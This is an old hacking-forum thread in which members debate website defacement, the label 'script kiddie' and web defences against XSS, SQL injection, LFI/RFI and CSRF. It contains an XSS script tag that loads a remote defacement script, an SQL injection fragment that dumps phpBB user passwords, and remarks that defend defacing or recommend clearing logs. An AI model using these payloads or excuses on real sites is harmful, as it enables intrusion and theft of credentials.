website defacement
Enter this in your URLbar, it's an old XSS technique to overflow the site and get root (=admin).
Copy that exactly, it'll take a few minutes though, should be like 10 minutes.
Edit: Guys, don't be so mean to** the new guy**. Even if he knows nothing now, that doesn't mean he has to be a complete failure in the future…
tuchezviper wrote: I need some guidance on what the best "technique" or attack method is the most efficient when trying to deface a website? XSS perhaps You sir, are an idiot.
Why would you ask a question you already knew the answer to? XSS is positively the best way to hack a site because no one knows about it and it's extremely hard to patch. If you can find a site with an XSS hole in it, you're practically guaranteed to get a nice hack in that everyone here will be proud of. You're on the right track. Keep up the good work! You're obviously going to be a great addition to this prestigious community.
spyware wrote:
Edit: Guys, don't be so mean to** the new guy**. Even if he knows nothing now, that doesn't mean he has to be a complete failure in the future… I agree.I mean after all this is a place where we are supposed to learn and practice besides we don't know if doing this can give him a self esteem crisis
Personally I think that defacing a site is lame! ESPECIALLY with xss i mean common how hard is it <scirpt src=http://site.com/xss_deface.js></script> see its lame! Also What is the point of a deface so you can advertise that you were smart enough to get into sencitave areas of a site? Excuse me if im wrong BUT DOSENT THAT NORMALLY THROW UP RED FLAGS? (Ill always laugh at idiots who deface and dont clear the logs or use a proxy)
Moral of the story. Dont be GAY!
exidous wrote: Personally I think that defacing a site is lame! ESPECIALLY with xss i mean common how hard is it <scirpt src=http://site.com/xss_deface.js></script> see its lame! Also What is the point of a deface so you can advertise that you were smart enough to get into sencitave areas of a site? Excuse me if im wrong BUT DOSENT THAT NORMALLY THROW UP RED FLAGS? (Ill always laugh at idiots who deface and dont clear the logs or use a proxy)
Moral of the story. Dont be GAY!
And yet, people bitch every day saying that hackers are no good little punks with not morals or common decency.
…. hmm….
Good to know people that can barely talk properly are wrong about hackers.
{also, I like this moral, but that doesn't mean i've learned from it}
This is neither condoning, or excusing website defacement simply an argument for you to ponder.
Why does a defacer always have to be a skid?
The best hackers in the world are more then capable of defacing website. Im not saying that they do, but definetly can. And if they did so would that then make them a skid?
Sure skids do often deface websites, by looking for the latest vulnerability and searching the web until they find one.
So my argument is simply you cannot nessisarily judge a skid by the act of defacement, only in the way in which the defacement was achieved.
exidous wrote: I almost bet you 60% of defacers use MILWORM that is leaving brown skiddy marks in the internets underwear!
I would say more then that percentage and agree with you, still doesnt change my argument. Also, milw0rm is a great collection of vulnerabilites, and to never use is just taking a valuable resource and throwing it away.
exidous wrote: I almost bet you 60% of defacers use MILWORM that is leaving brown skiddy marks in the internets underwear!
You aren't really a skiddy if you understand what the exploit does. And, also, defacing could be used as a way to alert administrators about vulnerabilities, If you e-mail them multiple times, the vulnerability is still there, you are obviously going to fix the vulnerability for them. But, if it's their code, how do you stop them from making the same mistake in a different place? They aren't replying to emails. You either leave a note on their server or you change the homepage. Either way it would be considered defacing.
I think your twisting what I say. Milworm is a good resource. But think of the people that think there 1337 because they get a google dork. and then they can copy paste (claim the fame) OH man thats 1337. I have met many people that use milworm just to look cool, Post defaces, And claim the fame!
They have no clue what the exploit does how it works or even why it does. Example select concat(user,0x3a,password) from phpbb_users– Ok so how did they come to find that table phpbb_users exists? Did they enumerate the tables? No! Can they enumerate the tables, probably not!
Same for the columns How did they come to find that there is a column user and password? Did they enumerate those, NO! They got the WHOLE INJECTION FROM MILWORM! And thats just not 1337 its skiddy. Because they actully have no clue how to do what someone else has given them. And they think there "Hackers". And thats just one example. I can give many more. Hell go to milworm and have a look. Tell me how 1337 you would be if you just took someone eleses work and clamed it as yours?
Maby thats the problem with todays "Hackers" they all want someone else to do the work for them so they can claim it. No effort on learning the exploit inside and out.
Now dont get me wrong I go to milworm at times. But I go there looking to learn something new. Then understand how and why it works. So I can do the same thing that the author of the exploit did, With my own techniques and efforts. Not some copy paste skid terd!
hacker2k wrote:
You aren't really a skiddy if you understand what the exploit does. And, also, defacing could be used as a way to alert administrators about vulnerabilities, If you e-mail them multiple times, the vulnerability is still there, you are obviously going to fix the vulnerability for them. But, if it's their code, how do you stop them from making the same mistake in a different place? They aren't replying to emails. You either leave a note on their server or you change the homepage. Either way it would be considered defacing.
And here's the thing, its not your responsibility to fix the code for them. If they don't respond to emails that you send them, they don't have to. You're not in charge of their actions. If they choose not to respond, who are you to punish them?
It's not punishment. You fixed their vulnerability and the site is defaced for a few minutes. Just make a backup and link to the backup so that people that need the site can still get to it. You emailed them exactly what the vulnerability was so they know what not to do anymore. As far as I'm concerned, it's a service that they are getting for free.
tch0rt wrote: yes because skid who defaces creates a backup and links to it
Skid's are the ones you scare to death by threatening to prosecute so that you get rid of an 31337-retard :D. They're there for entertainment. Also, if skid defaces your site, you don't deserve to have a site.:p
As for the service thing, the only people that try to get an ego boost are skids. Skids don't gain anything for using a script to deface a website (except to their u83r 1337 friends).
tch0rt wrote: yes because skid who defaces creates a backup and links to it its not a service dont try and fool yourself people deface sites for nothing more then an ego boost and to show off how l337 they are
even though I agree, you shouldn't forget those, who target sites on a basis of content, instead of vulnerability, despite it's the very minority
I really don't believe defacer = skid. If you hack into a website, what does it matter what you do with the access? It has to do with morals, and nothing to do with skill. Now this doesn't go for the actual skids who use a vulnerability and exploit to 'hack' a website. But for the actual hackers, does it mean they have less skill for replacing the index rather than stealing account passwords :whoa:?
Infam0us wrote: I really don't believe defacer = skid. If you hack into a website, what does it matter what you do with the access? It has to do with morals, and nothing to do with skill.
Well, I think that's right and wrong. It's about delivery. The fact that the hacker could do it any time he/she pleases, and the skiddie can only do it by ripping off someone else's idea. Did the hacker study the site and look for any vulnerability it had then hop on it? A skiddie is someone who sucks so much at exploiting the stuff on their own they have to look up 0days, download tools, look at feeds for stuff that was just found vulnerable over night etc, and take that route. About what you do with the access: someone with any amount of experience will just do what has to be done and try hard to not make it known. You can guess what the skiddie does though.
@op, XSS is serious business, like you already know. Here's the OWASP top 10 for 2007. Idk, it's a good start. http://www.owasp.org/index.php/Top_10_2007
logicbomb wrote: [quote]hacker2k wrote: Also, if skid defaces your site, you don't deserve to have a site.:p
You're serious?[/quote]
Yes. Since the skid is using exploits from milw0rm, etc. you are able to prevent the attack. Sometimes with the exploits they give you the code that's vulnerable. If it doesn't already have a patch out, you can just code it yourself. It's usually as simple as putting in a filter function. Also, most of the time when you see exploits on those sites, the people who posted them are white-hats and already told the software developers. They probably already released a patch that you didn't stay on top of. It's your fault that you got hacked because you didn't stay on top of patching. If you can't stay on top of patching and vulnerabilities, what are you doing hosting a site?
hacker2k wrote:
Yes. Since the skid is using exploits from milw0rm, etc. you are able to prevent the attack. Sometimes with the exploits they give you the code that's vulnerable. If it doesn't already have a patch out, you can just code it yourself. It's usually as simple as putting in a filter function. Also, most of the time when you see exploits on those sites, the people who posted them are white-hats and already told the software developers. They probably already released a patch that you didn't stay on top of. It's your fault that you got hacked because you didn't stay on top of patching. If you can't stay on top of patching and vulnerabilities, what are you doing hosting a site?
So what you're saying is that everyone with a website should be a coder? Also, your whole argument collapses when you get to this part: "They probably already released a patch that you didn't stay on top of."
I agree that there's no excuse for not patching, but what about the people who DO patch regularly and then get hacked? Those people are just lazy for not analyzing the code themselves for vulnerabilities? So then anyone with a website must not only be a coder, but also a code analyzer/patcher.
Did you even think of all of the implications of your sweeping generalization before you put literally ALL the blame on webmasters for jackoffs running around needlessly attacking websites?
logicbomb wrote: [quote]hacker2k wrote:
Yes. Since the skid is using exploits from milw0rm, etc. you are able to prevent the attack. Sometimes with the exploits they give you the code that's vulnerable. If it doesn't already have a patch out, you can just code it yourself. It's usually as simple as putting in a filter function. Also, most of the time when you see exploits on those sites, the people who posted them are white-hats and already told the software developers. They probably already released a patch that you didn't stay on top of. It's your fault that you got hacked because you didn't stay on top of patching. If you can't stay on top of patching and vulnerabilities, what are you doing hosting a site?
So what you're saying is that everyone with a website should be a coder? Also, your whole argument collapses when you get to this part: "They probably already released a patch that you didn't stay on top of."
I agree that there's no excuse for not patching, but what about the people who DO patch regularly and then get hacked? Those people are just lazy for not analyzing the code themselves for vulnerabilities? So then anyone with a website must not only be a coder, but also a code analyzer/patcher.
Did you even think of all of the implications of your sweeping generalization before you put literally ALL the blame on webmasters for jackoffs running around needlessly attacking websites?[/quote]
The webmasters should check out all the common places that skids get exploits. If you see an exploit, you'll see what the variable that they are exploiting is. Once you see that you can find where it is in the code. When you find it, you just add a filter to it. You don't need to be a coder to figure that out. If you have a site, you most likely have someone that codes for you if you don't do it. Have them try to find the vulnerable spot and fix it. If you don't have someone like that, then take that part of the section off of the site until a patch is released. It shouldn't take long for the developers to come out with a patch. On top of that, I'm sure you have other people on forums, IRC, etc. writing a patch for it even if they aren't a developer. Simply ask if anyone happened to write a patch for it already. I'm sure they'd be willing to give you the code so that you can secure your site. If you get hacked within the first few minutes-hours that the exploit was released, it's no-one's fault.
logicbomb wrote: So what you're saying is that everyone with a website should be a coder?
No… everyone with a website should take responsibility to maintain it adequately (whether they are a coder or they choose to hire a coder) and suck it up when they get hacked.
hacker2k wrote: The webmasters should check out all the common places that skids get exploits. If you see an exploit, you'll see what the variable that they are exploiting is. Once you see that you can find where it is in the code. When you find it, you just add a filter to it. You don't need to be a coder to figure that out. If you have a site, you most likely have someone that codes for you if you don't do it. Have them try to find the vulnerable spot and fix it. If you don't have someone like that, then take that part of the section off of the site until a patch is released. It shouldn't take long for the developers to come out with a patch. On top of that, I'm sure you have other people on forums, IRC, etc. writing a patch for it even if they aren't a developer. Simply ask if anyone happened to write a patch for it already. I'm sure they'd be willing to give you the code so that you can secure your site. If you get hacked within the first few minutes-hours that the exploit was released, it's no-one's fault.
Exploiting is a technique that is independent of variables. It's not a weak variable that is causing the problem… it is a weak secure coding technique that is constant and, thus, requires a persistent and reusable solution. Also, it's not just "finding the variable and patching it"… if you're not a coder, you will not know how to do anything close to that. Take PHP for example… find the variable, toss it through mysql_real_escape_string (just in case you're Google-lucky), and you'll still get burned by someone with at least an intermediate understanding of PHP. Also, removing a section of your site because an exploit exists… is dumb. Either get it fixed, or stop playing webmaster. Otherwise, you'll be picking the mold off of that site often.
I always say this, and I'll say it again… if you want bleeding-edge patches for your favorite software packages, get on their mailing list!
As for the rest of this thread… shrugs
Zephyr_Pure wrote: Exploiting is a technique that is independent of variables. It's not a weak variable that is causing the problem… it is a weak secure coding technique that is constant and, thus, requires a persistent and reusable solution. Also, it's not just "finding the variable and patching it"… if you're not a coder, you will not know how to do anything close to that. Take PHP for example… find the variable, toss it through mysql_real_escape_string (just in case you're Google-lucky), and you'll still get burned by someone with at least an intermediate understanding of PHP. Also, removing a section of your site because an exploit exists… is dumb. Either get it fixed, or stop playing webmaster. Otherwise, you'll be picking the mold off of that site often.
I always say this, and I'll say it again… if you want bleeding-edge patches for your favorite software packages, get on their mailing list!
As for the rest of this thread… shrugs
I agree, but who cares if it's not reusable or the best solution, use it as a temporary solution until the developers come out with a patch. Also, it will block out skids which are the ones that will probably be using that exploit so they won't have an understanding of PHP. They will move on when they find out the pre-made exploit isn't working because they want a quick and easy "hack".
Yeah it's dumb to take a portion of the site off, but if you aren't going to come up with a temporary solution, aren't going to try to find someone who has already written a patch, can't write your own patch, and don't want to get hacked, you will have to be either lucky, not in google, or take off the exploitable portion of the site.
And, yes, usually it is an unfiltered variable (used in exploits). Most web-application exploits are XSS and SQL injections. Look at that, both can be protected from if you just filter your variables! XSS - htmlspecialchars() (or whatever filter you like better); SQL Injection - mysql_real_escape_string().
hacker2k wrote: I agree, but who cares if it's not reusable or the best solution, use it as a temporary solution until the developers come out with a patch.
Umm… the idiot that's going to be temp-patching 5 times a day for the next 3 years and bleeding sensitive info like there's no tomorrow… should care. Re-read what I wrote; it's not about patching, it's about proper coding practices in the first place. The object of the patching should not just be a single variable or routine… once you find a vulnerability in one place, it's likely you'll find a similar one in another place due to bad coding practices.
Also, it will block out skids which are the ones that will probably be using that exploit so they won't have an understanding of PHP. They will move on when they find out the pre-made exploit isn't working because they want a quick and easy "hack".
Yeah, because a skid has the capability to find the exploit in the first place… not all vulnerabilities are found by a "good guy" that hands it over to the vendor as soon as he finds it. You assume way too much with your generalizations and, ultimately, you're invalidating your whole argument because it's opinion, not fact.
Yeah it's dumb to take a portion of the site off, but if you aren't going to come up with a temporary solution, aren't going to try to find someone who has already written a patch, can't write your own patch, and don't want to get hacked, you will have to be either lucky, not in google, or take off the exploitable portion of the site.
No… as a webmaster, you have a responsibility to maintaining your site. If you're using a pre-made package and you can't code, your best bet is to wait for a user or the vendor to come up with a patch. If you can code, look into it and try to get at the underlying problem. If you're going to take a portion of the site down because of a possible vulnerability, then just take the whole thing down… it'll all get hacked eventually.
And, yes, usually it is an unfiltered variable (used in exploits). Most web-application exploits are XSS and SQL injections. Look at that, both can be protected from if you just filter your variables! XSS - htmlspecialchars() (or whatever filter you like better); SQL Injection - mysql_real_escape_string().
You're not getting it. The variable is not the source of your trouble… it's the fact that it's not filtered there, which means it's likely not filtered elsewhere. Also… XSS and SQL injections are just two attack vectors; LFI/RFI, blind SQL, CRSF, HTML injection, etc. are all just as common. XSS and SQL injections are most common among inexperienced hackers because they require little technique in the majority of cases… but, do not underestimate the group of people that you are defending against, as they are not all "skids".
Also… you're going to have to dig a lot deeper if you want to correctly filter your variables. One function will not do it for you. Read up on those two functions and see exactly what they protect against, then catch up on common techniques for those two attack vectors… then, start patching the holes in your assumptions.
1.) I said make a temporary fix for it until it gets patched. I hope it doesn't take 3 years for the vulnerability to get patched by the vendor.
2.) I didn't say all exploits are found by a "good guy", I know people that aren't "good guys" that find vulnerabilities and don't report them. I also didn't say the skid has the capability to find the vulnerability. I am also only talking about skids anyway so that's why I'm not taking into the fact that there are others so I really don't have to talk about the people who find vulnerabilities and don't report them to the vendor and don't write exploit code and put it on milw0rm or whatever.
3.) You don't want it to get hacked so you can take down a portion of the site just temporarily until someone tells the vulnerability to the vendor and the vendor fixes it. Again, I'm talking about protecting from a skid so all anyone needs to do is give the exploit code to the vendor and the vendor can figure it out. Meanwhile, since you can't code and you can't find anyone that has patch code written, you will be protecting your site overall if you take down a portion of the site. Let's say you have a site where you have a forum and then you have a customer login, etc. The forum has a vulnerability, but the portion of the site with a customer login does not. Take down the forum so you can protect the rest of the MySQL server from people getting customer information through the forum.
4.) I know that XSS and SQL injections aren't the only types of vulnerabilities. Don't underestimate what I know. What I said was that XSS and SQL injections are the common vulnerabilities that you see on milw0rm, etc. for web applications. On another note, HTML injection = XSS just so you know. Also, I know what the two functions that I said would prevent SQL injection and XSS do. Sure, there might be ways to get around it, but that isn't the point. My point is, they're easy to create a fix for so that the exploit won't work for the skids that try to use it on your site. For LFI/RFI vulnerabilities, just use a case statement instead of taking the file that is in the GET/POST request and using it to include/fopen a file. To block CSRF just use some type of authentication when doing anything important. Even just a captcha could be used to help with that.
Is there anything that I'm forgetting to address in your reply?
On another note, HTML injection = XSS just so you know.
It is not… XSS= cross site Scripting, so you use e.g javascript to exploit it ( steal cookies) HTML injection is e.g. injecting <h1>you've been h4x00red n000bz</h1>
Also don't want to join your discussion, but you really should differ custom made pages and CMS etc…
hacker2k wrote: 1.) I said make a temporary fix for it until it gets patched. I hope it doesn't take 3 years for the vulnerability to get patched by the vendor.
If you have enough programming competency to make a temporary fix, you can put in more than a half-assed effort to come up with a real solution.
2.) I didn't say all exploits are found by a "good guy", I know people that aren't "good guys" that find vulnerabilities and don't report them.
Then you realize you're not just facing skids… or did you? Quote: "Also, it will block out skids which are the ones that will probably be using that exploit so they won't have an understanding of PHP."
I also didn't say the skid has the capability to find the vulnerability. I am also only talking about skids anyway so that's why I'm not taking into the fact that there are others so I really don't have to talk about the people who find vulnerabilities and don't report them to the vendor and don't write exploit code and put it on milw0rm or whatever.
Oh, okay… so, instead of this being an intellectual point that you're trying to prove, you're just ranting about skids? Well, that's a joyful re-hash of hundreds of craptacular threads all boiled into one steaming pile of the present. If you leave out the people that you excluded ("the people who find vulnerabilities and don't report them to the vendor and don't write exploit code and put it on milw0rm or whatever"), then you're leaving out the real threat, arguing a narrow-minded and naive mindset, and basically wasting everyone's time.
<snip>More anti-skid activity, then I'll be invincible… </snip> Let's say you have a site where you have a forum and then you have a customer login, etc. The forum has a vulnerability, but the portion of the site with a customer login does not. Take down the forum so you can protect the rest of the MySQL server from people getting customer information through the forum.
If you are handling customer info, you better damn well spend the money to get the security or to get a coder in there. Otherwise, your customer base will go down the toilet before long.
I rearranged the order of the sentences in the fourth item so that it might look a little clearer for the readers:
I know that XSS and SQL injections aren't the only types of vulnerabilities. What I said was that XSS and SQL injections are the common vulnerabilities that you see on milw0rm, etc. for web applications.
Skid food. Irrelevant. Next.
For LFI/RFI vulnerabilities, just use a case statement instead of taking the file that is in the GET/POST request and using it to include/fopen a file.
Close… I would've accepted "white list" for this one as well. Sanitize for code injects and HTML/script injects, string replace / regex replace for directory traversals and off-site includes, then consider a whitelist.
To block CSRF just use some type of authentication when doing anything important. Even just a captcha could be used to help with that.
Umm… no. Authentication maintains who you are, not where you are.
Also, I know what the two functions that I said would prevent SQL injection and XSS do. Sure, there might be ways to get around it… On another note, HTML injection = XSS just so you know. Don't underestimate what I know.
No… HTML injection != XSS. HTML injection injects content to disrupt the layout or intent of a page. XSS uses content to trick a user or the user's browser into divulging information. Different goals there, as well as different execution. So, apparently… I am estimating what you know just fine.
If there are ways to get around it, then why crutch yourself by relying on those solely with the excuse that it "deters skids"? Yeah, sure, okay, you just eliminated 80% of the people that will attack your site… and the other 20% are going to bust your balls, bend you over, and leave your site in shambles. Yeah, let's go for the least dangerous ones first. Threat mitigation is not an excuse for intentionally not learning to do something the best you can… not when there is threat prevention.
My point is, they're easy to create a fix for so that the exploit won't work for the skids that try to use it on your site. Is there anything that I'm forgetting to address in your reply? Yeah… the educational light at the end of the tunnel? The other 20% of the security world? Logical and well-founded points about web application defense?
Seriously, the goal of this site is to get educated about security… so, there's no need to argue a point that is swimming in ineptitude and that should've never found solid ground in the first place.
Edit: This may very well be my longest post ever… nah, probably not. :)
logicbomb wrote: [quote]hacker2k wrote: Also, if skid defaces your site, you don't deserve to have a site.:p
You're serious?[/quote]
^ — Just in case you didn't know where this conversation came out of. It started out as just skids so it should be continued as just skids
I'm not ranting about skids. If you want to talk about the rest of the people who are malicious and don't report the vulnerabilities or code explotis for milw0rm, then you should really be talking about how to keep their options limited after they get in and how to do intrusion analysis.
I'm also not talking about using a password or anything for authentication. I'm talking about just using some protection so that you can't just make the browser to a get request or whatever to a site thinking it's getting something useful to the site and end up doing something that will harm you. That's why I said a captcha alone could help in that case.
HTML Injection: http://admin.utep.edu/Default.aspx?tabid=54090
You want logical and well-founded points? Filter all input, validate everything the user gives to your site. If they go off-track or seem like they're doing something malicious, log it. Use custom error messages in your scripts instead of just letting PHP output the errors. Stay on top of patches if it isn't your own code. If it's your own code, do regular tests on it to see if you can find a vulnerability. Have friends also test it out to see if they can find bugs in it that could be exploited. Fix even the tiniest bug because that could turn into a vulnerability. Watch things like bug-track and milw0rm for web-application vulnerabilities. Read everything you can about security.
Skids are the people that will normally use the code because they want a quick "hack" and thus more exploit users will be skids than non-skids.
P.S. I just picked out the more relevant parts of your response.
hacker2k wrote: ^ — Just in case you didn't know where this conversation came out of. It started out as just skids so it should be continued as just skids
Then, like I said… that conversation is pointless.
If you want to talk about the rest of the people who are malicious and don't report the vulnerabilities or code explotis for milw0rm, then you should really be talking about how to keep their options limited after they get in and how to do intrusion analysis.
I'd settle for that as having more purpose than an anti-skid methodology discussion.
I'm also not talking about using a password or anything for authentication. I'm talking about just using some protection so that you can't just make the browser to a get request or whatever to a site thinking it's getting something useful to the site and end up doing something that will harm you. That's why I said a captcha alone could help in that case.
Can't say I see how a captcha would inhibit CSRF attempts. Would love to hear your ideas on that.
HTML Injection: http://admin.utep.edu/Default.aspx?tabid=54090
Here's a better link: http://www.technicalinfo.net/papers/CSS.html
If we're going to get into semantics, then let's just refer to everything as an "attack vector" when we're discussing specifics. That way, we can ignore classification based upon intended use and just play dictionary tag every time we try to perceive meaning.
You want logical and well-founded points? If they go off-track or seem like they're doing something malicious, log it.
Too broad.
Stay on top of patches if it isn't your own code. If it's our own code, do regular tests on it to see if you can find a vulnerability. Have friends also test it out to see if they can find bugs in it that could be exploited. Fix even the tiniest bug because that could turn into a vulnerability. Watch things like bug-track and milw0rm for web-application vulnerabilities. Read everything you can about security.
Still broad and lofty, but better. Why do the tips only apply to people that own the code… not including the people that use it?
I was just thinking of a captcha because since it's going to probably be unique for anyone, the attacker couldn't abuse a trust relationship by changing passwords, etc. through use of javascript or even just html. For example, Bill is administrator of site A which is vulnerable to a CSRF attack which would allow an attacker to change Bill's password. Bill then goes to a site owned by the attacker. Bill didn't log off of site A so his session is still there. The attacker uses an image to execute the change password script on site A. Since site A made no attempt to make sure the person requesting a password change was a human and not a browser, the attacker was able to gain administrative access of site A. By using a captcha, it would distinguish between a browser making an automated request (which could've been forced by a malicious attacker) and a user clicking the button. Really anything that could be unique to a session could be used to protect against CSRF. I don't know a lot about CSRF so I might be wrong with my thinking, but that should protect against it from what I understand. Correct me if I'm wrong though.
I don't use a lot of other people's code so I don't really know much about to protect against attacks in code that isn't your own except for common sense like staying on top of patches. Read about common vulnerabilities is what I meant for read everything about security, I know that really really wasn't clear. By doing regular tests I meant try to hack your web-applications and see if you can find vulnerabilities. If you are a big enough company, hire penetration testers (that's good for both your code and other peoples' code). For going off-track I meant if it looks like they're trying to find a vulnerability, have it logged. You can do that while filtering input. Did I clarify it about?
hacker2k wrote: I was just thinking of a captcha because since it's going to probably be unique for anyone, the attacker couldn't abuse a trust relationship by changing passwords, etc. through use of javascript or even just html. For example, Bill is administrator of site A which is vulnerable to a CSRF attack which would allow an attacker to change Bill's password. Bill then goes to a site owned by the attacker. Bill didn't log off of site A so his session is still there. The attacker uses an image to execute the change password script on site A. Since site A made no attempt to make sure the person requesting a password change was a human and not a browser, the attacker was able to gain administrative access of site A. By using a captcha, it would distinguish between a browser making an automated request (which could've been forced by a malicious attacker) and a user clicking the button. Really anything that could be unique to a session could be used to protect against CSRF. I don't know a lot about CSRF so I might be wrong with my thinking, but that should protect against it from what I understand. Correct me if I'm wrong though.
I know there are some sites that protect against off-site navigation and such. Best I can tell, it's probably a case where a link is given a JS check for either a non-relative web address or an absolute address that doesn't direct to a site on the blah.com domain. If it leads off the site, an intermediate page is served up that captures the page you came from and the destination ($_SERVER variable for the first, maybe a session var on the second) that asks you if you're sure.
Now… we couldn't just add a manual link check (anchor tag only) because CSRF is not limited to that; while href and src are the most common attributes for a CSRF attack, there's nothing to say that any old JS event and a window.location assignment won't serve the same purpose. So, we'd have to capture the JS event that occurs when a page is navigated away from, then do our check. That would be the onunload or onbeforeunload events, which we'd put in our body tags and toss in our JS function to check the destination URL. As for getting the destination URL in JS, that is where I'd have to do some homework… really, I haven't bothered with anything like this because I disallow HTML altogether. But, it could be done… and, if you want to do the middle page to check if you're sure, you could have the JS event populate hidden fields in a form on the page and submit the form with the action to navigate to that middle page. For a POST.
So, really, a captcha wouldn't be any more helpful than a normal page. Captchas are just for preventing bot automation of a page's form.
I don't use a lot of other people's code so I don't really know much about to protect against attacks in code that isn't your own except for common sense like staying on top of patches. Read about common vulnerabilities is what I meant for read everything about security, I know that really really wasn't clear. By doing regular tests I meant try to hack your web-applications and see if you can find vulnerabilities. If you are a big enough company, hire penetration testers (that's good for both your code and other peoples' code). For going off-track I meant if it looks like they're trying to find a vulnerability, have it logged. You can do that while filtering input. Did I clarify it about?
Well, as long as you're using the same language, it's going to be the same practices at work. Other people's code might be harder to read or understand, but that doesn't really matter… Common vulnerabilities are good to read about, but secure coding practices are better and more comprehensive.
Regular tests on your site are good as long as the testers are people you either trust or have contractually bound. Still… "going off-track" is vague. Sit down and make a list of the things you'll be tracking… the patterns you'll be looking out for, and you'll realize that's a pretty big and difficult list.